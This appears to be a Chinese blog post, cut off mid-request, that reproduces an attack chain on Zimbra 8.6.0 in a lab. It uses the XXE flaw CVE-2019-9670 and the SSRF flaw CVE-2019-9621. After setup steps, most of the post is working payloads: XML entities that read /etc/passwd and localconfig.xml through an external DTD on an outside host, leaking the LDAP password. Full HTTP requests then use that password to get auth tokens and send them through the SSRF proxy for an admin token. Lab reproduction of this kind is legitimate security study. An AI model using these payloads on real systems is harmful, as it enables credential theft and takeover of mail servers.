当前位置:   article > 正文

Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现

cve-2019-9670

参考

zimbra RCE环境搭建到复现再到exp编写
https://xz.aliyun.com/t/7991#toc-5

zimbra RCE 漏洞利用
https://cloud.tencent.com/developer/article/1752450
  • 1
  • 2
  • 3
  • 4
  • 5
环境搭建

安装依赖

ubuntu ip addr: 192.168.8.129

apt-get install libgmp10 libperl5.18 unzip pax sysstat sqlite3 dnsmasq wget

ubuntu环境需要为14,其他版本可能安装libperl5.18会报错,后续可能也会有一大堆问题,所以还是用14比较好
  • 1
  • 2
  • 3
  • 4
  • 5

配置hostname和dns服务器

vim /etc/hostname

mail.test.com
  • 1
  • 2
  • 3

image-20230304211741392

vim /etc/hosts

192.168.8.129	mail.test.com	mail
  • 1
  • 2
  • 3

image-20230304211941632

vim /etc/dnsmasq.conf

server=192.168.8.130
domain=test.com
mx-host=test.com, mail.test.com, 5
mx-host=mail.test.com, mail.test.com, 5
listen-address=127.0.0.1
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

image-20230304215010657

下载有漏洞版本的zimbra,解压,进入解压后的目录进行安装

wget https://files.zimbra.com/downloads/8.6.0_GA/zcs-8.6.0_GA_1153.UBUNTU14_64.20141215151116.tgz

tar xvf zcs-8.6.0_GA_1153.UBUNTU14_64.20141215151116.tgz
cd zcs-8.6.0_GA_1153.UBUNTU14_64.20141215151116
sudo ./install.sh

安装时注意观察返回结果,可能会报错缺少依赖信息,按缺少的依赖补充安装即可
一些缺少的依赖可以直接用apt-get安装,对于缺少libgmp3c2,参考文章中的链接已失效,可以采用以下链接安装

wget http://launchpadlibrarian.net/70575439/libgmp3c2_4.3.2+dfsg-2ubuntu1_amd64.deb
sudo dpkg -i libgmp3c2_4.3.2+dfsg-2ubuntu1_amd64.deb
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

安装配置zimbra

复现时使用的是dnsmasq,所以除了zimbra-dnscache选择 n ,其他默认 y 即可。
之后会进入Main menu界面,选择 6 配置 zimbra-store,选择 4 设置管理员密码,之后输入 a 应用配置,之后默认yes,最后保存更新系统设置yes即可

安装完成后,访问登陆界面即可
https://192.168.8.129:7071/zimbraAdmin
  • 1
  • 2
  • 3
  • 4
  • 5
CVE-2019-9670 XXE

漏洞路由

https://192.168.8.130:7071/Autodiscover/Autodiscover.xml
  • 1

使用burpsuite或者其他接口测试工具以post方式发送一个空标签,Content-Type设置为application/xml,界面返回400解析错误,可能存在xxe

image-20230304223010581

构造XML Poc验证是否存在XXE漏洞

<!DOCTYPE asd [
<!ELEMENT name ANY >
<!ENTITY asd SYSTEM "file:///etc/passwd" >]>
 <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
      <EMailAddress>asdasd@ad.com</EMailAddress>
      <AcceptableResponseSchema>&asd;</AcceptableResponseSchema>
    </Request>
  </Autodiscover>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9

页面503,返回了读取的文件信息,存在XXE

image-20230304223333516

利用xxe获取localconfig.xml 中的用户名和密码,由于localconfig.xml为XML文件,需要加上CDATA标签才能作为文本读取,由于XXE不能内部实体进行拼接,所以此处需要使用外部dtd,payload构造如下:

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
  • 1
  • 2
  • 3
  • 4

启动远程服务,发送如下payload,利用xxe读取默认用户zimbra的密码,密码字段在zimbra_ldap_password

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 192.168.8.130:7071
Content-Length: 400
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<!DOCTYPE Autodiscover [
        <!ENTITY % dtd SYSTEM "http://192.168.8.129:99/1.txt">
        %dtd;
        %all;
        ]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
    </Request>
</Autodiscover>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21

成功读取到密码

image-20230312120557068

CVE-2019-9621 SSRF

利用前面的xxe漏洞读取到的账号密码,获取一个低权限token

POST /service/soap HTTP/1.1
Host: 192.168.8.130
Content-Length: 463
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAccount">
        <account by="adminName">zimbra</account>
        <password>lDsiZPjl</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23

这里是向客户端登陆处/service/soap发送,也可以向管理员登陆处7071端口/service/admin/soap发送payload直接获取高权限token,注意下改端口以及将<AuthRequest xmlns="urn:zimbraAccount">改为<AuthRequest xmlns="urn:zimbraAdmin">

image-20230312143307461

将获取到的低权限token设置到cookie中,探测是否存在ssrf,注意,修改cookie时如果401错误,将cookie字段ZM_AUTH_TOKEN改为ZM_ADMIN_AUTH_TOKEN即可

POST /service/proxy?target=https://abcd.0lzme4.dnslog.cn HTTP/1.1
Host: 192.168.8.130:7071
Content-Length: 0
Cookie: ZM_ADMIN_AUTH_TOKEN=0_445fad824269f204515a7c310c0fc7fbfcfc425c_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637383737333133323439343b747970653d363a7a696d6272613b7469643d31303a313338303230313330343b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12

image-20230312144020869

image-20230312143836682

image-20230312144141257

ssrf可利用后,结合低权限token获取一个高权限token,将<AuthRequest xmlns="urn:zimbraAccount">改为<AuthRequest xmlns="urn:zimbraAdmin">

POST /service/proxy?target=https://192.168.8.130:7071/service/admin/soap HTTP/1.1
Host: 192.168.8.130:7071
Content-Length: 461
Cookie: ZM_ADMIN_AUTH_TOKEN=0_445fad824269f204515a7c310c0fc7fbfcfc425c_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637383737333133323439343b747970653d363a7a696d6272613b7469643d31303a313338303230313330343b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小小林熬夜学编程/article/detail/462834
推荐阅读
相关标签
  

闽ICP备14008679号